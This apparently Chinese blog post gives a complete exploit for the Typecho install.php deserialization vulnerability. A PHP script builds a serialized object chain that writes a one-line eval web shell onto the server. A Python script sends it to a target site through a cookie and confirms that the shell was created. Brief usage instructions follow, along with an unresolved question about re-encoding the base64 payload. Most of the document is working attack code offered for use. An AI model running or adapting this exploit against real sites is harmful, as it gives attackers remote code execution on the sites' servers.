(来源)[https://mp.weixin.qq.com/s/kra9OUpwCC7zotDVUmGWyQ]

exp.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php

/**
* Created by PhpStorm.
* User: RaI4over
* Date: 2017/10/19
* Time: 15:17
* 生成 _typecho_config 的值
*/
class Typecho_Feed
{
const RSS2 = 'RSS 2.0';
private $_type;
private $_charset;
private $_lang;
private $_items = array();

public function __construct($version, $type = self::RSS2, $charset = 'UTF-8', $lang = 'en')
{
$this->_version = $version;
$this->_type = $type;
$this->_charset = $charset;
$this->_lang = $lang;
}

public function addItem(array $item)
{
$this->_items[] = $item;
}
}

class Typecho_Request
{
private $_params = array('screenName'=>'fputs(fopen(\'./a.php\',\'w\'),\'<?php @eval($_POST[minty]);?>\')');
private $_filter = array('assert');
//private $_filter = array('assert', array('Typecho_Response', 'redirect'));

}

$payload1 = new Typecho_Feed(5, 'ATOM 1.0');
$payload2 = new Typecho_Request();
$payload1->addItem(array('author' => $payload2));
$exp['adapter'] = $payload1;
$exp['prefix'] = 'MxxY';
echo base64_encode(serialize($exp));

exp.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
import os

if __name__ == '__main__':
print ''' ____ ____ _ _ _
| __ ) _ _ | _ \ __ _(_) || | _____ _____ _ __
| _ \| | | | | |_) / _` | | || |_ / _ \ \ / / _ \ '__|
| |_) | |_| | | _ < (_| | |__ _| (_) \ V / __/ |
|____/ \__, | |_| \_\__,_|_| |_| \___/ \_/ \___|_|
|___/
'''

targert_url = 'https://xxxxx';

rsp = requests.get(targert_url + "/install.php");
if rsp.status_code != 200:
exit('The attack failed and the problem file does not exist !!!')
else:
print 'You are lucky, the problem file exists, immediately attack !!!'

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", }

typecho_config = os.popen('php exp.php').read()

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Cookie': 'antispame=1508415662; antispamkey=cc7dffeba8d48da508df125b5a50edbd; PHPSESSID=po1hggbeslfoglbvurjjt2lcg0; __typecho_lang=zh_CN;__typecho_config={typecho_config};'.format(typecho_config=typecho_config),
'Referer': targert_url}

url = targert_url + "/install.php?finish=1"

requests.get(url,headers=headers,allow_redirects=False)

shell_url = targert_url + '/a.php'
if requests.get(shell_url).status_code == 200:
print 'shell_url: ' + shell_url
else:
print "Getshell Fail!"

  • 将exp.php和exp.py放至同级目录,修改exp.py中的target_url为目标url
  • 一句话木马内容和路径可在exp.php中修改,修改后同样需要修改exp.py中的路径

另外

我在尝试修改exp时,想不使用php去获得payload,于是将执行php exp.php之后输出的base64编码还原为原文,但是在再次使用base64进行编码的时候发现编码后的base64值与之前的不一致,不知道为什么

测试脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
import base64

str="YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NTp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJlbiI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6ODA6ImZwdXRzKGZvcGVuKCcuL3Vzci90aGVtZXMvZGVmYXVsdC9pbWcvdGV3LnBocCcsJ3cnKSwnPD9waHAgQGV2YWwoJF9QT1NUW3hdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fXM6ODoiX3ZlcnNpb24iO2k6NTt9czo2OiJwcmVmaXgiO3M6ODoiUmFpNG92ZXIiO30="

str2=base64.b64decode(str)

print str2

code="""a:2:{s:7:"adapter";O:12:"Typecho_Feed":5:{s:19:"Typecho_Feed_type";s:8:"ATOM 1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"en";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:80:"fputs(fopen('./usr/themes/default/img/tew.php','w'),'<?php @eval($_POST[x]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}s:8:"_version";i:5;}s:6:"prefix";s:8:"Rai4over";}"""

str3 =base64.b64encode(code)

print str3==str

很迷。。可能是编码问题?
解决之后再更新吧。。


2017-10-28
Contents

⬆︎TOP